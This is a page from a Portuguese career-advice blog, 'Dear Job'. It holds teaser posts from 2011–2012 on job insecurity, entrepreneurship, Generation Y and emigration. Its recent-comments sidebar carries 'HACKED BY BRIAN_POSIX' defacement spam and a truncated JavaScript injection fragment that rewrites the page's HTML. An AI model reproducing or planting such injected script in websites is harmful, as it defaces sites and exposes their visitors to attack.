Dear Job @ 18:48

Seg, 16/04/12

Se sente que está completamente perdida no seu trabalho, se sente que foi encostada, e que a sua vida parou e ninguém deu por isso…não fique presa, e não deixe que isso lhe aconteça a si.

Existem atualmente milhões de pessoas que gostariam de dar uma volta à sua carreira, e à sua vida pessoal e profissional. Que procuram o emprego perfeito.
E não adianta andar a contar a sua história a pessoas que estão mesma situação: porque só vai piorar.

No próximo Dear Job vamos lançar a primeira pedra para poder iniciar um processo de transformação da sua carreira. Está preparada? Quer?




Tags:


Dear Job @ 18:33

Seg, 02/04/12

Numa altura de grande incerteza onde ninguém sabe que rumo tomar, o maior perigo é o de não fazer nada.


Por todo o lado se ouvem noticias, que são alertas que não devemos ignorar, e por isso ficar à espera de que algo aconteça é a pior decisão, mesmo que isso possa parecer uma decisão.


Acredito que vivemos uma época onde ser realista é melhor que ser optimista.


No próximo Dear Job vamos falar de como podemos inverter essa tendência para a inércia e estar preparada para (quase) tudo.


Tags:


Dear Job @ 18:31

Seg, 19/03/12

São os futuros lideres das organizações. Os próximos a ocupar os lugares de destaque no panorama mundial.


São ambiciosos, instáveis e cheios de opiniões. Procuram um significado em tudo o que fazem, quer seja na vida profissional como pessoal.


A melhor forma de os motivar não é com dinheiro, mas sim com oportunidades para evoluírem nas suas capacidades, querendo sempre mais e mais desafios.


Conhecedores das novas tecnologias, têm uma grande capacidade para aprender e aproveitar todas as novidades que aparecem.


São a geração com maior noção de marketing pessoal até à data e o conceito de horário é algo que, para muitos, não faz sentido, estando sempre ligados e prontos para agir.


No próximo Dear Job vamos falar sobre a Geração Y. Uma geração complicada, mas com muito para oferecer à sua empresa... se souber lidar com eles.


Tags:


Dear Job @ 10:52

Ter, 06/03/12

“Está cansado do seu chefe? Está farto de procurar emprego e não consegue? Acha que tem demasiado talento e não o consegue implementar na sua empresa?  Ganha pouco? Então chegou a altura e ter o seu próprio negócio e de ser Patrão de si próprio.”

Este parece um anúncio de uma grande multinacional há uns anos a recrutar talentos. Mas na realidade, com este tipo de discurso, muitas pessoas são aliciadas (inclusive pelo Governo) para criarem o seu próprio trabalho e se lançarem por conta própria. Para ajudar “à propaganda”, estão constantemente a surgir entrevistas e reportagens de pessoas que falam do seu sucesso e de como é bom e acessível ser empreendedor.

Mas convém ver outras notícias: têm vindo para a comunicação social também muitas noticias que nos dão conta de empreendedores que estão a passar dificuldades, pois os dados do INE dizem que em Portugal "Cerca de 73% das empresas sobrevivem ao primeiro ano e só 54% superam a barreira dos dois."
Será então o empreendedorismo uma boa decisão? Depende do seu perfil. Se tomar a decisão errada, em vez de uma porta para a liberdade é uma porta para o inferno.

No próximo Dear Job vamos falar sobre factores que podem influenciar a sua escolha entre decidir trabalhar por conta própria ou não.


Tags:


Dear Job @ 18:31

Seg, 20/02/12

Como pode o Twitter melhorar a sua vida ou emprego?

A comunicação no social media tem vindo a ser encurtada (no caso do twitter para 140 caracteres) e a maneira como apresentamos informação no trabalho também pode seguir o mesmo caminho.

A forma de causarmos uma boa impressão depende cada um, e do contexto, contudo se conseguir comunicar de uma forma clara, direta e com significado, irá certamente ter uns pontos extra.

Nestes tempos, simplificar é a palavra de ordem, pois se assim não for as pessoas desligam.

No próximo Dear Job, vamos explicar, o que é afinal a Comunicação Twitter e como ela pode resolver muitos problemas.


Tags:


Dear Job @ 18:50

Seg, 06/02/12

É frequente ouvirmos falar sobre locais de trabalho como a Google e a Microsoft como locais fantásticos para se trabalhar. As condições e infraestruturas que oferecem aos seus colaboradores já se tornaram lendárias e apetecíveis pela maior parte de nós.

No entanto, todas as regalias que lhes são oferecidas também destroem o equilíbrio entre vida profissional e pessoal. Ou seja, mesmo aqueles que são considerados os melhores locais para se trabalhar têm os seus inconvenientes. Portanto, se estes, que são os melhores, têm falhas e não garantem a felicidade dos seus colaboradores, então que hipóteses terão os outros locais de trabalho mais “normais”?

No próximo Dear Job vamos falar sobre fatores que podem influenciar a sua felicidade no local de trabalho e o que você pode fazer em relação a eles.


Tags:


Dear Job @ 18:31

Seg, 23/01/12

Pode salvar vidas, reduzir os seus custos dramaticamente, pô-lo a viajar, mudar o sentido da sua vida...transformar 2012 “O ano que ninguém quer” numa oportunidade para crescer. No próximo Dear Job vamos dar-lhe a ferramenta que revoluciona a cultura humana e o seu trabalho há milhares de anos e que, ainda hoje, mais tem contribuído para melhorar a vida de todos nós.



 




Dear Job @ 18:31

Seg, 19/12/11

John Deere disse: “Não associarei o meu nome a um produto que não contenha o que de melhor há em mim”.

Com todos os momentos e socialização que irão existir neste período: festas de Natal, de passagem de ano, trocas de boas festas e desejos de ano novo, este pode ser o momento ideal para capitalizar relações e contactos.

No próximo Dear Job vamos dar alguma técnicas para aproveitar da melhor maneira estes momento e criar novas relações.


Tags:


Dear Job @ 18:37

Seg, 07/11/11

Este podia ser o lema dos Descobrimentos Portugueses, pois esta foi a real motivação para nos arriscarmos a fazermos viagens perigosas até aos confins do mundo. Mais do que “dar novos mundos ao mundo”, os navegadores estavam à procura de melhores condições de vida. De oportunidades para ter sucesso...e desde então o povo Português nunca mais parou de procurar. Emigrar não é um realidade recente para os Portugueses, o que é recente é a emigração de toda uma geração formada em vez dos menos escolarizados. Estamos a assistir a uma fuga diária de milhares de jovens que estão à procura de algo tão simples quanto um primeiro emprego. Numa altura em que Portugal está em profunda recessão, é importante ter os olhos no mundo. Cá pode não haver trabalho, mas no resto do mundo há. No próximo Dear Job vamos falar sobre o que quem está lá fora tem para aconselhar a quem se está a preparar para sair.


Tags:


Dear Job @ 18:17

Seg, 24/10/11

Orçamento de estado, medidas da troika, corte no subsídio de Natal, alargamento do horário de trabalho, crise mundial, dívidas de milhares de milhões de euros...

 

O resultado de todas estas mudanças é simples: a sociedade e o emprego como o conhecemos está morto. A transformação será feia e dolorosa, mas está aí...com uma fúria inimaginável.

 

Todas as nossas organizações vão ser reinventadas de uma forma total nos próximos 10 anos.

Toda a segurança do emprego, como nós a conhecemos nos ultimas 3 ou 4 gerações acabou, foi-se.

No entanto, não há uma porta com uma seta a dizer “saída”.

 

A mudança chegou e depressa. E com ela uma questão que confronta cada instituição e cada pessoa: lutar contra a mudança ou agarrar-se a ela e aproveitar a viagem?


Eu digo aproveita!.. antes que seja tarde.

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO